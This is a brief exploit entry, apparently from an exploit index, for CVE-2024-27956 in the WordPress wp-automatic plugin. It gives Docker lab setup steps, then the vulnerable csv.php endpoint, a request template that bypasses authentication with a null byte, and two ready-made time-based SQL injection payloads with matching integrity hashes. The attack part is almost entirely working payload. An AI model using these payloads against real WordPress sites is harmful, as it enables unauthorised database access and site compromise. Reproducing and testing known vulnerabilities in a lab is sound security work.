Share
## https://sploitus.com/exploit?id=CAD433EE-C330-5C86-BB2B-A69E658CD0C1
# CVE-2024-27956
Note
Build wordpress: docker-compose -f stack.yml up
Install plugin:
1. WordPress dashboard, choose Plugins > Add New
2. Click Upload Plugin

3. Choose File -> wp-automatic.zip -> Install Now

4. After the installation is complete, click Activate Plugin

Exploit
```<HOST>/wp-content/plugins/wp-automatic/inc/csv.php```
```q={{query}}&auth=%00&integ={{md5query}}```
```
q=SELECT+IF(1=1,sleep(5),sleep(0))&auth=%00&integ=93cf9aa11e746596d6f31765a7222c9f
```

```
q=SELECT+IF(1=2,sleep(5),sleep(0))&auth=%00&integ=4b1f4024af81df56c3b00679b9b52183
```
